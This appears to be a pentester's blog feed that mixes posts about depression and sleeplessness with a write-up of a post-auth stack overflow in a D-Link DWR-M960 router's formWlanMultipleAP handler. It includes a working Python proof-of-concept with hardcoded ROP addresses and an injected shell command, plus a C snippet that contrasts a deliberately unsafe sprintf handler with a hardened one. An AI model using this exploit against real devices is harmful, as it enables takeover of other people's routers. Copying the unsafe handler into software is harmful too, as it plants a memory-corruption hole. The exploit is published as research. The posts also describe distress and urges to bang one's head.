Pentest, OSINT, reverse engineering, RCE/LPE addict.
My name is Johnny Clathetic.
Dark thoughts and weird-to-understand jokes. "If you don't understand, assume that I'm dumb."
https://heapdump.alwaysdata.net/
another night.. Sleepless. I keep thinking about all the things I missed, all the mistakes that mattered more than I admitted.
I'm alone, sad and tired. I want to bang my head on the wall to stop thinking. I see sparkles and reality becomes an insane nightmare. I can't take a break, I want to be a stone to stop this suffering but life doesn't remain in rocks. That's unfortunate. Why doesn't the human brain have a stop switch? It would be so simple to turn it off for a few hours. My eyes hurt and I can't sleep.
When I’m deep in another depressive slump, I open IDA and start defining structures. It’s one of the few things that settles my mind. Watching raw decompilation slowly become something structured feels like carving a little bit of order out of the chaos in my head.

Even trying was a failure. Everything I touch turns into a miserable failure.

It wasn't even a glamorous bug, just a small, post-auth crack in the plaster. Still, I thought it was mine for a few hours. I traced it, mapped it, coaxed it into an exploit. I let myself feel that quiet, private satisfaction that maybe, just maybe, I’d seen something no one else had.

I should have googled "/boafrm/formWlanMultipleAP" before trying anything. It turns out it’s been known for at least a year. https://www.cve.org/CVERecord?id=CVE-2025-6486
The exploit works. The code runs. The world just doesn’t care. I keep staring at my reflection in the window, trying to remember when I started mistaking echoes for discoveries. I sit there with my rotted PoC, my notes, my late afternoon optimism, and realize I celebrated too loudly in an empty room. The window’s open. The air is fresh and honest in a way I’m not sure I deserve tonight.

and here is the POC, ugly, but working:
```python
#! /usr/bin/python3

import requests
import sys

# just auth with a browser and grab cookie
# the js code is awful, I'm too bored to reverse it
cookies = {"webuicookie":sys.argv[1]}
host="http://127.0.0.1" #adjust

# We need to browse /wlmultipleap.htm first
page1="/wlmultipleap.htm"
# otherwise form is not accessible
page2="/boafrm/formWlanMultipleAP"

r = requests.get(host+page1, cookies=cookies)
hdr={"Content-Type": "application/x-www-form-urlencoded"}

data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="
data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209
data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 register
data = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #pad
data = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)
data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #pad
data = data+"%C8%01%80%40" #stack addr 0x408001c8
data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #pad

r = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)
```
In my PoC, I wanted to do:
`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`
but the `id` applet is not compiled into the BusyBox :D :D

Is it a #0day? Yeah, I guess?
The sub_455480 function is flawed. This function parses some data sent to boafrm/formWlanMultipleAP. Guess what it does with the submit-url parameter? Yep, printf to a stack var. We can't use null bytes, but libc is loaded at 0x3fd25000 so it's not a problem (and ASLR/PIE is nonexistent on those small routers), so everything can be hardcoded.
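As an added illustration of the bug class described in this post (not the router's code, which is not on this page): a hypothetical handler that prints the submit-url value into a fixed-size stack buffer, next to a bounded, allow-listed rewrite of the same handler. The buffer size, the function names and the accepted page-name format are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define URL_BUF 256   /* assumed size of the handler's stack buffer */

/* Bug class from the post: the form value is printed into a stack buffer
 * with no length check, so a value longer than URL_BUF overwrites what
 * follows the buffer (saved registers, return address). Not the real
 * sub_455480; kept here only for contrast. Never feed it untrusted input. */
void redirect_unchecked(const char *submit_url) {
    char target[URL_BUF];
    sprintf(target, "%s", submit_url);
    /* ... the handler would now redirect the client to target ... */
}

/* Hardened version: bound the copy and only accept a plain page name.
 * Returns 1 and fills dst on success, 0 (dst emptied) on rejection. */
int redirect_checked(char *dst, size_t dst_len, const char *submit_url) {
    const char *ext = ".htm";
    size_t ext_len = strlen(ext);
    size_t n = strlen(submit_url);

    dst[0] = '\0';
    if (n == 0 || n >= dst_len)          /* must fit, terminator included */
        return 0;
    if (n < ext_len || strcmp(submit_url + n - ext_len, ext) != 0)
        return 0;                        /* page name, not a path or script */
    for (size_t i = 0; i < n; i++) {     /* allow-list the characters */
        unsigned char c = (unsigned char)submit_url[i];
        if (c == '/' && i == 0)
            continue;                    /* one leading slash is fine */
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;                    /* ';', '%', spaces, raw bytes ... */
    }
    memcpy(dst, submit_url, n + 1);
    return 1;
}

/* Convenience wrapper using the handler's own buffer size. */
int submit_url_accepted(const char *submit_url) {
    char target[URL_BUF];
    return redirect_checked(target, sizeof target, submit_url);
}
```

The checked version rejects the value shape used in the PoC twice over: it is far longer than the buffer, and it contains shell metacharacters and raw bytes outside the allow-list.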
at last. Finally got RCE on the DLINK DWR M960
go exploit, or play with firmae now?

"FirmAE is a fully-automated framework that performs emulation and vulnerability analysis. FirmAE significantly increases the emulation success rate (From Firmadyne's 16.28% to 79.36%) with five arbitration techniques. We tested FirmAE on 1,124 wireless-router and IP-camera firmware images from top eight vendors."

ok. Definitely take a look at this one.

ok, I'm definitely a dumbass. The title in the xterm clearly says: "firmae".
And with a bit of googling, we find the GitHub:
https://github.com/pr0v3rbs/FirmAE
GitHub - pr0v3rbs/FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis